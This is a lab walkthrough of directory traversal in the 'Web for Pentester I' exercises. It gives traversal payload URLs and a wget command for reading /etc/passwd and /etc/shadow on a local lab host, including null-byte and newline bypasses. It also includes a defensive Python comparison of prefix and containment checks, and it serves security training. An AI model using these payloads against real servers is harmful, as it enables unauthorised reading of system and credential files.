Directory/file traversal
Example 1
First look at the HTML tag the lab originally provides; the guess is that file is a relative path.
    <img src="dirtrav/example1.php?file=hacker.png" width="20">
Test approach
    http://192.168.56.101/dirtrav/example1.php?file=hacker.png
    http://192.168.56.101/dirtrav/example1.php?file=./hacker.png
    http://192.168.56.101/dirtrav/example1.php?file=../hacker.png
    http://192.168.56.101/dirtrav/example1.php?file=../../../../../../../../../../../../etc/passwd
Once the path reaches the root directory /, going up to the parent with another ../ still lands on /, so a few extra ../ segments do no harm.
    http://192.168.56.101/dirtrav/example1.php?file=../../../../../../../etc/passwd
    http://192.168.56.101/dirtrav/example1.php?file=../../../../../../../etc/shadow
    http://192.168.56.101/dirtrav/example1.php?file=../../../../../../../../../../../../../../../../../etc/passwd
Using wget
    wget -O - 'http://192.168.56.101/dirtrav/example1.php?file=../../../../../../../etc/passwd'
Example 2
First look at the HTML the lab example gives.
    <img src="dirtrav/example2.php?file=/var/www/files/hacker.png" width="20">
From this, the file parameter appears to be an absolute path.
Test approach
    http://192.168.56.101/dirtrav/example2.php?file=/var/www/files/hacker.png
    http://192.168.56.101/dirtrav/example2.php?file=/var/www/files/../files/hacker.png
    http://192.168.56.101/dirtrav/example2.php?file=/etc/passwd
    http://192.168.56.101/dirtrav/example2.php?file=/boot/../etc/passwd
    http://192.168.56.101/dirtrav/example2.php?file=/var/www/files/../../../../etc/passwd  # bypass succeeded
The guess is that the backend restricts only the leading part of the parameter with a regular expression, which is why a path that starts with the allowed directory and then climbs out with ../ gets through.
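To make the difference between that kind of prefix check and a proper containment check concrete, here is an added Python example (not the lab's PHP code, and the lab's real check is only guessed at). It assumes a base directory of /var/www/files, treats relative input as relative to that directory, and uses lexical normalisation so it runs offline; the comments note where a real server would also resolve symlinks on disk.

```python
import posixpath
from typing import Optional

# Assumed base directory; the lab's /var/www/files is used only as a label here.
BASE_DIR = "/var/www/files"


def prefix_check_allows(user_path: str) -> bool:
    """Model of the guessed Example 2 check: accept any path that merely starts
    with the allowed directory. Anything after the prefix, including '..', is
    never inspected, so the check is trivially escaped."""
    return user_path.startswith(BASE_DIR + "/")


def resolve_safely(user_path: str) -> Optional[str]:
    """Hardened check: reject control characters, canonicalise the path, and
    require the canonical result to stay inside BASE_DIR.

    Returns the canonical path, or None when the request must be refused.
    """
    # Null bytes and line breaks have no business in a file name; refuse early
    # rather than letting a lower layer (C string handling, a regex) truncate.
    if any(ch in user_path for ch in ("\x00", "\n", "\r")):
        return None

    # Relative input (Example 1/3 style) is anchored under BASE_DIR; absolute
    # input (Example 2 style) is taken as given. normpath collapses '.' and
    # '..' segments, so the decision is made on what the OS would actually open.
    candidate = user_path if user_path.startswith("/") else posixpath.join(BASE_DIR, user_path)
    canonical = posixpath.normpath(candidate)

    # On a real server, follow this with os.path.realpath() on the filesystem
    # and repeat the containment test, so symlinks cannot point outside BASE_DIR.
    if canonical != BASE_DIR and not canonical.startswith(BASE_DIR + "/"):
        return None
    return canonical


def compare_checks(user_path: str) -> dict:
    """Run both checks on one input so the gap between them is visible."""
    return {
        "input": user_path,
        "prefix_check_allows": prefix_check_allows(user_path),
        "resolved": resolve_safely(user_path),
    }


if __name__ == "__main__":
    # Constructed inputs modelled on the lab's Example 1 and 2 requests.
    for sample in (
        "hacker.png",
        "../../../../../../../etc/passwd",
        "/var/www/files/hacker.png",
        "/var/www/files/../files/hacker.png",
        "/boot/../etc/passwd",
        "/var/www/files/../../../../etc/passwd",
    ):
        print(compare_checks(sample))
```

The prefix check passes the last sample because it starts with the allowed directory; the containment check refuses it because the canonical path is /etc/passwd. The second sample shows the same decision made on a relative path, which is Example 1's shape.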
Example 3
First look at the HTML the lab example gives.
    <img src="dirtrav/example3.php?file=hacker" width="20">
It looks like file should be a relative path, with the backend appending the file extension itself.
Test approach
    http://192.168.56.101/dirtrav/example3.php?file=hacker
    http://192.168.56.101/dirtrav/example3.php?file=./hacker
    http://192.168.56.101/dirtrav/example3.php?file=../hacker
    http://192.168.56.101/dirtrav/example3.php?file=../../../../../etc/passwd
    http://192.168.56.101/dirtrav/example3.php?file=../../../../../etc/passwd%0a
    http://192.168.56.101/dirtrav/example3.php?file=../../../../../etc/passwd%00
References
Web for pentester I part 2
http://www.atomsec.org/%E5%AE%89%E5%85%A8/web_for_pentester_i-part-2/